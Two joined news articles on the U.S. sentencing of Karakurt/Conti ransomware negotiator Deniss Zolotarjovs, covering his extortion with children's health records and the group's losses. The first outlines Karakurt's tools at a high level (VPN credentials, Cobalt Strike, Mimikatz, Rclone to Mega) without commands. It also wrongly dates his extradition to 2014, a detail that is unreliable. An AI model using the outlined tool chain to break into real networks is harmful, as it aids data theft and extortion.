Deniss Zolotarjovs was sentenced to 8.5 years in the U.S. after pleading guilty to money laundering and fraud tied to ransomware.

Deniss Zolotarjovs, a Latvian national linked to the Karakurt ransomware gang, has been sentenced to 8.5 years in U.S. prison, marking a significant step in efforts to combat global ransomware operations.

“A Latvian national was sentenced today to 102 months in prison for his role in a major Russian ransomware organization that stole from and extorted over 54 companies.” reads the press release published by DoJ.

In August 2024, the man was charged with money laundering, wire fraud, and extortion. He was arrested in Georgia in December 2023 and extradited to the U.S. in 2014.

In 2025, he pleaded guilty to money laundering and wire fraud conspiracy. Rather than carrying out technical intrusions, Zolotarjovs acted as a negotiator and strategist.

He analyzed stolen data, set ransom demands, and communicated directly with victims, earning about 10% of ransom payments through cryptocurrency laundering. Prosecutors described him as a key intermediary within a broader cybercrime ecosystem tied to former members of the Conti ransomware group.

Between 2021 and 2023, the group targeted over 54 organizations, causing over $56 million in losses. Victims included businesses, government entities, and even a pediatric healthcare provider.

“According to court documents, Deniss Zolotarjovs (Денисс Золотарёвс), 35, of Moscow, Russia, was a member of a ransomware organization led by former leaders of the Conti ransomware group. Brands used to identify the organization in ransom notes to their victims during the time of his involvement include Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.” continues the press release. “During the time of Zolotarjovs’s active participation in the organization, approximately June 2021 to August 2023, the organization stole data from over 54 companies, including many in the United States. “

In one case, Zolotarjovs suggested leaking children’s medical data to pressure payment, highlighting the coercive tactics used. Another attack disrupted a U.S. 911 emergency dispatch system, underscoring the real-world impact of these operations.

“In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion.” DoJ states. “When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims.”

Authorities say the case reflects the increasingly organized and professional nature of ransomware groups, which operate like businesses with defined roles such as negotiators, operators, and data brokers. It also demonstrates growing international cooperation, particularly between U.S. agencies and Georgian authorities, in tracking and prosecuting cybercriminals.

Officials from the Federal Bureau of Investigation emphasized that this sentencing sends a strong message: even individuals operating within Russia-linked cybercrime networks can be identified, pursued, and brought to justice. The case highlights both the human cost of ransomware attacks and the expanding reach of global law enforcement in tackling cyber extortion.

“With this sentence, a cruel, ruthless, and dangerous international cybercriminal is now behind bars,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments. The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate.”

Accenture researchers first detailed the activity of the sophisticated financially motivated threat actor in December 2021. The group’s activity was first spotted in June 2021, but the group has been more active in Q3 2021.

Zolotarjovs is the first member of the Karakurt group to be sentenced in the United States.

Most of the known victims are based in North America, while the remaining are in Europe. 

The analysis of the attack chain associated with this threat actor revealed that it primarily leverages VPN credentials to gain initial access to the target’s network.

In the initial attacks, the group gained persistence by using the popular post-exploitation tool Cobalt Strike. Later, the group switched on the VPN IP pool or AnyDesk software to establish persistence and avoid detection.

Once access is gained to the target network, the group used various tools to escalate privileges, including Mimikatz or PowerShell to steal ntds.dit that contains Active Directory data.

However, the threat group in most attacks escalated privileges using previously obtained credentials.

For data exfiltration the group used 7zip and WinZip for compression, as well as Rclone or FileZilla (SFTP) to upload data to Mega.io cloud storage.

The Karakurt cyber extortion group typically gave victims one week to pay a ransom, which ranges from $25,000 to $13 million in Bitcoin. This information comes from a joint alert issued by the FBI, CISA, the Department of the Treasury, and FinCEN.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Karakurt ransomware)

The post Conti Ransomware Leader Sentenced for Pediatric Extortion and Global Terror appeared first on Daily CyberSecurity.

A ransomware organization sentencing has brought one of the key operatives behind a major cybercrime group to justice, highlighting the global reach of law enforcement in tackling ransomware attacks. A Latvian national, Deniss Zolotarjovs, has been sentenced to 102 months in prison for his role in a Russian-linked ransomware organization responsible for targeting more than 54 companies worldwide. The sentencing marks a significant development in ongoing efforts to dismantle international ransomware networks. According to the U.S. Department of Justice, Zolotarjovs played a central role in extortion operations carried out between June 2021 and August 2023. The group operated under multiple ransomware brands, including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, reflecting a complex and evolving cybercrime structure.

Ransomware Organization Sentencing: Role in Extortion and Data Exploitation

Officials said Zolotarjovs was primarily responsible for increasing pressure on victims who hesitated to pay ransom demands. He analyzed stolen data and used sensitive information to intensify extortion tactics. In one case involving a pediatric healthcare provider, Zolotarjovs used children’s health information to pressure the organization into paying. When the ransom demand was not met, he allegedly encouraged co-conspirators to leak or sell the data. Court documents reveal he distributed a bulk set of sensitive records to hundreds of patients, aiming to amplify fear and force compliance. Assistant Attorney General A. Tysen Duva described Zolotarjovs as a “cruel, ruthless, and dangerous international cybercriminal,” noting that his actions included exploiting highly personal data to increase leverage over victims.

Financial and Operational Impact of Attacks

The ransomware organization’s activities caused widespread damage. Of the more than 54 targeted companies, attacks on 13 resulted in losses exceeding $56 million, including approximately $2.8 million paid in ransom. An additional 41 companies are believed to have paid around $13 million, though detailed loss figures are still being compiled. Authorities estimate that the total financial impact could reach hundreds of millions of dollars when factoring in underreported incidents. Beyond financial losses, the attacks led to the exposure of highly sensitive data, including Social Security numbers, addresses, dates of birth, and healthcare records. In one instance, a government entity’s 911 emergency system was forced offline, raising serious concerns about public safety and the broader consequences of ransomware attacks.

Organized Structure and Global Operations

Investigators found that the ransomware organization operated with a structured hierarchy and used a network of companies across Russia, Europe, and the United States to mask its activities. Members were largely based in Russia and reportedly operated from an office in St. Petersburg. The group’s operations also involved corruption and misuse of public resources. Authorities said some members had ties to former Russian law enforcement, allowing them to access databases, intimidate individuals, and identify potential recruits. These connections also enabled members to avoid scrutiny, including evading taxes and military service through bribes.

Arrest, Extradition, and Prosecution

Zolotarjovs was arrested in Georgia in December 2023 and later extradited to the United States in August 2024 after contesting the process. In July 2025, he pleaded guilty to conspiracy charges involving money laundering and wire fraud. The case was investigated by the Federal Bureau of Investigation, with support from multiple field offices and international partners. Special Agent in Charge Jason Cromartie said the case reflects the agency’s continued efforts to track down cybercriminals operating across borders. U.S. Attorney Dominick S. Gerace II added that the prosecution demonstrates that cybercriminals cannot rely on geography or anonymity to evade justice.

Continued Focus on Ransomware Threats

The ransomware organization sentencing highlight the scale and persistence of ransomware threats targeting businesses and public services. Authorities said investigations into related actors and networks remain ongoing as part of broader efforts to disrupt global cybercrime operations.